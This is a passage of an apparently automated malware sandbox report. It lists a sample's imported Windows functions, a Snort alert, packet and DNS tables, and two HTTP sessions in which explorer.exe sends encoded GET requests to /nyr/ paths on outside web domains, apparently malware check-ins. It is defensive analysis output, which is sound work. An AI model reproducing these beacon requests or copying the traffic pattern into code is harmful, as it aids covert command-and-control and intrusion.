                                        GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                        KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                        Possible Origin

                                        Language of compilation system | Country where language is spoken
                                        English | United States

                                        Network Behavior

                                        Snort IDS Alerts

                                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                        05/04/21-07:04:44.374290 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49754 | 23.227.38.74 | 192.168.2.4

                                        Network Port Distribution

                                        TCP Packets

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        May 4, 2021 07:04:44.156946898 CEST | 49754 | 80 | 192.168.2.4 | 23.227.38.74
                                        May 4, 2021 07:04:44.200963020 CEST | 80 | 49754 | 23.227.38.74 | 192.168.2.4
                                        May 4, 2021 07:04:44.201138973 CEST | 49754 | 80 | 192.168.2.4 | 23.227.38.74
                                        May 4, 2021 07:04:44.201277971 CEST | 49754 | 80 | 192.168.2.4 | 23.227.38.74
                                        May 4, 2021 07:04:44.242088079 CEST | 80 | 49754 | 23.227.38.74 | 192.168.2.4
                                        May 4, 2021 07:04:44.374289989 CEST | 80 | 49754 | 23.227.38.74 | 192.168.2.4
                                        May 4, 2021 07:04:44.374347925 CEST | 80 | 49754 | 23.227.38.74 | 192.168.2.4
                                        May 4, 2021 07:04:44.374392033 CEST | 80 | 49754 | 23.227.38.74 | 192.168.2.4
                                        May 4, 2021 07:04:44.374419928 CEST | 80 | 49754 | 23.227.38.74 | 192.168.2.4
                                        May 4, 2021 07:04:44.374439001 CEST | 80 | 49754 | 23.227.38.74 | 192.168.2.4
                                        May 4, 2021 07:04:44.374450922 CEST | 80 | 49754 | 23.227.38.74 | 192.168.2.4
                                        May 4, 2021 07:04:44.374499083 CEST | 80 | 49754 | 23.227.38.74 | 192.168.2.4
                                        May 4, 2021 07:04:44.374547958 CEST | 49754 | 80 | 192.168.2.4 | 23.227.38.74
                                        May 4, 2021 07:04:44.374583960 CEST | 49754 | 80 | 192.168.2.4 | 23.227.38.74
                                        May 4, 2021 07:04:44.374627113 CEST | 49754 | 80 | 192.168.2.4 | 23.227.38.74
                                        May 4, 2021 07:04:44.374713898 CEST | 49754 | 80 | 192.168.2.4 | 23.227.38.74
                                        May 4, 2021 07:05:04.632004976 CEST | 49768 | 80 | 192.168.2.4 | 198.185.159.144
                                        May 4, 2021 07:05:04.802618980 CEST | 80 | 49768 | 198.185.159.144 | 192.168.2.4
                                        May 4, 2021 07:05:04.802793026 CEST | 49768 | 80 | 192.168.2.4 | 198.185.159.144
                                        May 4, 2021 07:05:04.803034067 CEST | 49768 | 80 | 192.168.2.4 | 198.185.159.144
                                        May 4, 2021 07:05:04.973489046 CEST | 80 | 49768 | 198.185.159.144 | 192.168.2.4
                                        May 4, 2021 07:05:04.979024887 CEST | 80 | 49768 | 198.185.159.144 | 192.168.2.4
                                        May 4, 2021 07:05:04.979042053 CEST | 80 | 49768 | 198.185.159.144 | 192.168.2.4
                                        May 4, 2021 07:05:04.979053020 CEST | 80 | 49768 | 198.185.159.144 | 192.168.2.4
                                        May 4, 2021 07:05:04.979098082 CEST | 80 | 49768 | 198.185.159.144 | 192.168.2.4
                                        May 4, 2021 07:05:04.979115963 CEST | 80 | 49768 | 198.185.159.144 | 192.168.2.4
                                        May 4, 2021 07:05:04.979126930 CEST | 80 | 49768 | 198.185.159.144 | 192.168.2.4
                                        May 4, 2021 07:05:04.979140043 CEST | 80 | 49768 | 198.185.159.144 | 192.168.2.4
                                        May 4, 2021 07:05:04.979151964 CEST | 80 | 49768 | 198.185.159.144 | 192.168.2.4
                                        May 4, 2021 07:05:04.979167938 CEST | 80 | 49768 | 198.185.159.144 | 192.168.2.4
                                        May 4, 2021 07:05:04.979185104 CEST | 80 | 49768 | 198.185.159.144 | 192.168.2.4
                                        May 4, 2021 07:05:04.979249001 CEST | 49768 | 80 | 192.168.2.4 | 198.185.159.144
                                        May 4, 2021 07:05:04.979291916 CEST | 49768 | 80 | 192.168.2.4 | 198.185.159.144
                                        May 4, 2021 07:05:04.979320049 CEST | 49768 | 80 | 192.168.2.4 | 198.185.159.144
                                        May 4, 2021 07:05:05.149884939 CEST | 80 | 49768 | 198.185.159.144 | 192.168.2.4
                                        May 4, 2021 07:05:05.149898052 CEST | 80 | 49768 | 198.185.159.144 | 192.168.2.4
                                        May 4, 2021 07:05:05.149910927 CEST | 80 | 49768 | 198.185.159.144 | 192.168.2.4
                                        May 4, 2021 07:05:05.149943113 CEST | 80 | 49768 | 198.185.159.144 | 192.168.2.4
                                        May 4, 2021 07:05:05.149954081 CEST | 80 | 49768 | 198.185.159.144 | 192.168.2.4
                                        May 4, 2021 07:05:05.149971962 CEST | 80 | 49768 | 198.185.159.144 | 192.168.2.4
                                        May 4, 2021 07:05:05.149986029 CEST | 49768 | 80 | 192.168.2.4 | 198.185.159.144
                                        May 4, 2021 07:05:05.149990082 CEST | 80 | 49768 | 198.185.159.144 | 192.168.2.4
                                        May 4, 2021 07:05:05.150005102 CEST | 80 | 49768 | 198.185.159.144 | 192.168.2.4
                                        May 4, 2021 07:05:05.150032043 CEST | 49768 | 80 | 192.168.2.4 | 198.185.159.144
                                        May 4, 2021 07:05:05.150060892 CEST | 49768 | 80 | 192.168.2.4 | 198.185.159.144

                                        UDP Packets

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        May 4, 2021 07:03:04.079806089 CEST | 53723 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:04.128549099 CEST | 53 | 53723 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:04.402079105 CEST | 64646 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:04.451792002 CEST | 53 | 64646 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:04.625377893 CEST | 65298 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:04.682780027 CEST | 53 | 65298 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:09.192593098 CEST | 59123 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:09.244214058 CEST | 53 | 59123 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:10.528140068 CEST | 54531 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:10.585149050 CEST | 53 | 54531 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:12.016319990 CEST | 49714 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:12.065512896 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:13.324980021 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:13.373613119 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:14.347913027 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:14.398215055 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:15.327704906 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:15.376349926 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:18.472831964 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:18.521564007 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:18.886133909 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:18.950181007 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:19.645800114 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:19.705853939 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:20.693160057 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:20.744755983 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:21.635854959 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:21.684545994 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:22.595444918 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:22.647067070 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:23.611274958 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:23.660603046 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:24.855562925 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:24.909923077 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:26.444029093 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:26.500868082 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:29.521269083 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:29.571320057 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:30.757359028 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:30.817164898 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:31.698815107 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:31.747591972 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:32.627163887 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:32.676263094 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:34.472414017 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:34.522587061 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:35.616674900 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:35.666146040 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:36.767832041 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:36.816679955 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:43.253061056 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:43.305869102 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:03:49.856846094 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:03:49.917939901 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:04:00.702004910 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:04:00.760590076 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:04:18.112989902 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:04:18.163423061 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:04:21.772597075 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:04:21.849781990 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:04:24.722948074 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:04:24.786619902 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:04:44.075501919 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:04:44.139606953 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:04:45.625130892 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:04:45.676755905 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:04:46.303735018 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:04:46.360747099 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:04:46.929398060 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:04:46.977905035 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:04:47.406775951 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:04:47.455522060 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:04:47.511563063 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:04:47.568937063 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:04:48.044918060 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:04:48.104701042 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:04:48.713677883 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:04:48.770565033 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:04:49.241159916 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:04:49.298403978 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:04:50.088316917 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:04:50.137880087 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:04:51.005819082 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:04:51.073479891 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:04:51.560627937 CEST | 52752 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:04:51.617695093 CEST | 53 | 52752 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:05:01.171524048 CEST | 60542 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:05:01.223176003 CEST | 53 | 60542 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:05:02.719784975 CEST | 60689 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:05:02.789992094 CEST | 53 | 60689 | 8.8.8.8 | 192.168.2.4
                                        May 4, 2021 07:05:04.566591024 CEST | 64206 | 53 | 192.168.2.4 | 8.8.8.8
                                        May 4, 2021 07:05:04.631026030 CEST | 53 | 64206 | 8.8.8.8 | 192.168.2.4

                                        DNS Queries

                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                        May 4, 2021 07:04:21.772597075 CEST | 192.168.2.4 | 8.8.8.8 | 0x430f | Standard query (0) | www.magnumopuspro.com | A (IP address) | IN (0x0001)
                                        May 4, 2021 07:04:44.075501919 CEST | 192.168.2.4 | 8.8.8.8 | 0x9a0f | Standard query (0) | www.maluss.com | A (IP address) | IN (0x0001)
                                        May 4, 2021 07:05:04.566591024 CEST | 192.168.2.4 | 8.8.8.8 | 0x7689 | Standard query (0) | www.exclusiveflooringcollection.com | A (IP address) | IN (0x0001)

                                        DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 4, 2021 07:04:21.849781990 CEST | 8.8.8.8 | 192.168.2.4 | 0x430f | Name error (3) | www.magnumopuspro.com | none | none | A (IP address) | IN (0x0001)
May 4, 2021 07:04:44.139606953 CEST | 8.8.8.8 | 192.168.2.4 | 0x9a0f | No error (0) | www.maluss.com | lightcollect.myshopify.com |  | CNAME (Canonical name) | IN (0x0001)
May 4, 2021 07:04:44.139606953 CEST | 8.8.8.8 | 192.168.2.4 | 0x9a0f | No error (0) | lightcollect.myshopify.com | shops.myshopify.com |  | CNAME (Canonical name) | IN (0x0001)
May 4, 2021 07:04:44.139606953 CEST | 8.8.8.8 | 192.168.2.4 | 0x9a0f | No error (0) | shops.myshopify.com |  | 23.227.38.74 | A (IP address) | IN (0x0001)
May 4, 2021 07:05:04.631026030 CEST | 8.8.8.8 | 192.168.2.4 | 0x7689 | No error (0) | www.exclusiveflooringcollection.com | ext-sq.squarespace.com |  | CNAME (Canonical name) | IN (0x0001)
May 4, 2021 07:05:04.631026030 CEST | 8.8.8.8 | 192.168.2.4 | 0x7689 | No error (0) | ext-sq.squarespace.com |  | 198.185.159.144 | A (IP address) | IN (0x0001)
May 4, 2021 07:05:04.631026030 CEST | 8.8.8.8 | 192.168.2.4 | 0x7689 | No error (0) | ext-sq.squarespace.com |  | 198.49.23.145 | A (IP address) | IN (0x0001)
May 4, 2021 07:05:04.631026030 CEST | 8.8.8.8 | 192.168.2.4 | 0x7689 | No error (0) | ext-sq.squarespace.com |  | 198.185.159.145 | A (IP address) | IN (0x0001)
May 4, 2021 07:05:04.631026030 CEST | 8.8.8.8 | 192.168.2.4 | 0x7689 | No error (0) | ext-sq.squarespace.com |  | 198.49.23.144 | A (IP address) | IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • www.maluss.com
                                        • www.exclusiveflooringcollection.com

                                        HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49754 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 07:04:44.201277971 CEST | 6365 | OUT | GET /nyr/?tVZl=MKniHD/KKNZ944A0QkseLq559MRPs5jQaAqVav9SZ3PAwf03LQBPNZ+ImXhjCplVxvzR&U4kp=NtxHhLZ8S6kT5jw HTTP/1.1
                                        Host: www.maluss.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
May 4, 2021 07:04:44.374289989 CEST | 6367 | IN | HTTP/1.1 403 Forbidden
                                        Date: Tue, 04 May 2021 05:04:44 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        X-Sorting-Hat-PodId: 161
                                        X-Sorting-Hat-ShopId: 45740490914
                                        X-Dc: gcp-us-central1
                                        X-Request-ID: 0046b1ca-de3c-4bc2-af9b-2bb790ee44c9
                                        X-XSS-Protection: 1; mode=block
                                        X-Download-Options: noopen
                                        X-Content-Type-Options: nosniff
                                        X-Permitted-Cross-Domain-Policies: none
                                        CF-Cache-Status: DYNAMIC
                                        cf-request-id: 09d75cbaca00000614e9283000000001
                                        Server: cloudflare
                                        CF-RAY: 649f30a47de50614-FRA
                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                        Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 
67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67
                                        Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-heig


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49768 | 198.185.159.144 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 07:05:04.803034067 CEST | 7277 | OUT | GET /nyr/?tVZl=EDKKYtZbbvwE4Q/e7xe/ld4gtfmRUWoVn+FtgOYbXYxqqFBCU6VSMnG1GKc/0KEvkVST&U4kp=NtxHhLZ8S6kT5jw HTTP/1.1
                                        Host: www.exclusiveflooringcollection.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
May 4, 2021 07:05:04.979024887 CEST | 7281 | IN | HTTP/1.1 400 Bad Request
                                        Cache-Control: no-cache, must-revalidate
                                        Content-Length: 77564
                                        Content-Type: text/html; charset=UTF-8
                                        Date: Tue, 04 May 2021 05:05:04 UTC
                                        Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                        Pragma: no-cache
                                        Server: Squarespace
                                        X-Contextid: GJ1alLZ7/6uMYlJPg
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 
20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 